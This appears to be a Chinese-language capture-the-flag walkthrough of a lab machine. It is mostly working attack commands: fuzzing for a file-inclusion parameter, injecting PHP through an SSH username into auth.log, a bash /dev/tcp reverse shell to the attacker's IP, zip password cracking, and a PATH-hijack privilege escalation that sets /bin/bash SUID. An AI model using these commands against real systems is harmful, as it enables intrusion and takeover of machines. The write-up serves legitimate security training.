描述
Difficulty: Easy
A easy box for beginners, but not too easy. Good Luck.
Hint: Enumerate Property.
nmap扫存活
data:image/s3,"s3://crabby-images/831b8/831b8ccbe373779d7b4a04890794c3c5785aef01" alt="image-20221203121418124"
1 2
| kali 192.168.169.220 靶机 192.168.169.232
|
靶机扫描
data:image/s3,"s3://crabby-images/5a61c/5a61c619596d75815ced76faabc5eacec18e132e" alt="image-20221203121440475"
80
data:image/s3,"s3://crabby-images/9a375/9a37554ae96fc5934e6049bfff0ac4c9ceb1fa3a" alt="image-20221203121651288"
目录扫描
data:image/s3,"s3://crabby-images/bd264/bd264e781038d0c49c0e7f4cdc7cdb57e211b16c" alt="image-20221203122354802"
tasks
data:image/s3,"s3://crabby-images/6700a/6700aeb40a56529cf5bdaffabffe612a1ddf95e6" alt="image-20221203122623901"
blog-post
data:image/s3,"s3://crabby-images/1415e/1415ef6484941b3239a553172a0169e14f5bac71" alt="image-20221203122700484"
1
| gobuster dir -u http://192.168.169.232/blog-post/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
|
data:image/s3,"s3://crabby-images/4cf39/4cf392ca19a1ef3b4a97c65331c33a1642c8430b" alt="image-20221203123101812"
data:image/s3,"s3://crabby-images/91e77/91e7703a2bc56451953aeefdcfd562a8618b5fd3" alt="image-20221203123131264"
模糊测试
1
| wfuzz -u http://192.168.169.232/blog-post/archives/randylogs.php?FUZZ=/etc/passwd -w /usr/share/seclists/Discovery/Web-Content/big.txt --hw 0
|
data:image/s3,"s3://crabby-images/cf5b5/cf5b5e74f69d57f260c0565fd973c7227c4e4201" alt="image-20221203125540494"
1
| ffuf -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://192.168.169.232/blog-post/archives/randylogs.php?FUZZ=/etc/passwd -fs 0
|
data:image/s3,"s3://crabby-images/4c1bf/4c1bfb4cab8dd13e1992e7bbf15cc2b06f832952" alt="image-20221203125836278"
1
| http://192.168.169.232/blog-post/archives/randylogs.php?file=/etc/passwd
|
data:image/s3,"s3://crabby-images/0ee76/0ee7652a1fa6c17d11e04687bf5ed6280175dbf2" alt="image-20221203130024729"
data:image/s3,"s3://crabby-images/469ca/469ca03a9d0d8858a3fa8ef9efe1ad018bdabd03" alt="image-20221203130213355"
- 可以访问系统文件,看先之前提到的 auth.log 日志:
1
| http://192.168.169.232/blog-post/archives/randylogs.php?file=/var/log/auth.log
|
- 发现会记录 ssh 登录的所有活动,那我们可以尝试添加恶意 PHP 代码作为用户名,该代码将从用户输入并执行命令。
1
| ssh '<?php system($_REQUEST['cmd']);?>'@192.168.169.232
|
data:image/s3,"s3://crabby-images/d4e07/d4e07f79e9c6bb88c8ceb3bf201ea1799ea46544" alt="image-20221203133033950"
1 2 3
| 其他问题靶机ip改为 192.168.169.233
view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig
|
data:image/s3,"s3://crabby-images/1903d/1903d370d5250c5b8c5f0dece2c679e41f817249" alt="image-20221203135038587"
1
| view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=whoami
|
data:image/s3,"s3://crabby-images/0058a/0058ae73a07becf94ec2d02b6d88b4a4dec9f1ad" alt="image-20221203135152688"
写入shell
- nc 监听
- url编码
1
| bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'
|
1
| bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
|
1
| view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
|
data:image/s3,"s3://crabby-images/78234/7823400b9129dab46c162dcc2ada144130988bd7" alt="image-20221203140056224"
提权
data:image/s3,"s3://crabby-images/d2568/d2568012c4378e69fe7bc9ae80b8e38661f12560" alt="image-20221203140527755"
- 使用python开启http服务,也可以使用nc传输文件
1
| python3 -m http.server 8000
|
data:image/s3,"s3://crabby-images/1a154/1a15475311af846cad47eb337689cb7534187d16" alt="image-20221203140809349"
1 2 3
| fcrackzip,
安装:apt-get install fcrackzip
|
1
| fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt user_backup.zip
|
data:image/s3,"s3://crabby-images/1493c/1493c005bba43b03d9cf0d5efa359a7a3af50d5d" alt="image-20221203141401793"
data:image/s3,"s3://crabby-images/cc2c4/cc2c43d31f44a557123a43de8b1db87aa0846340" alt="image-20221203141544377"
切换用户
1 2 3
| ssh randy@192.168.169.233
randylovesgoldfish1998
|
data:image/s3,"s3://crabby-images/50b85/50b85c8e2934adfdd595edced8fdbd62e3bd31a8" alt="image-20221203141721522"
data:image/s3,"s3://crabby-images/4293f/4293f3df6ee09294165b2a29b9d69cd7f693ea56" alt="image-20221203141832524"
借用别人的方法
1 2 3 4 5 6 7 8 9
| echo 'chmod +s /bin/bash' > cat
chmod 777 cat
export PATH=/home/randy/tools:$PATH
./easysysinfo
/bin/bash -p
|
data:image/s3,"s3://crabby-images/821f2/821f2c768327e498333e21fb1f938402cda11793" alt="image-20221203142702850"
data:image/s3,"s3://crabby-images/2e742/2e7423df269b0112937088a4e4fe63a62bb32a28" alt="image-20221203143224102"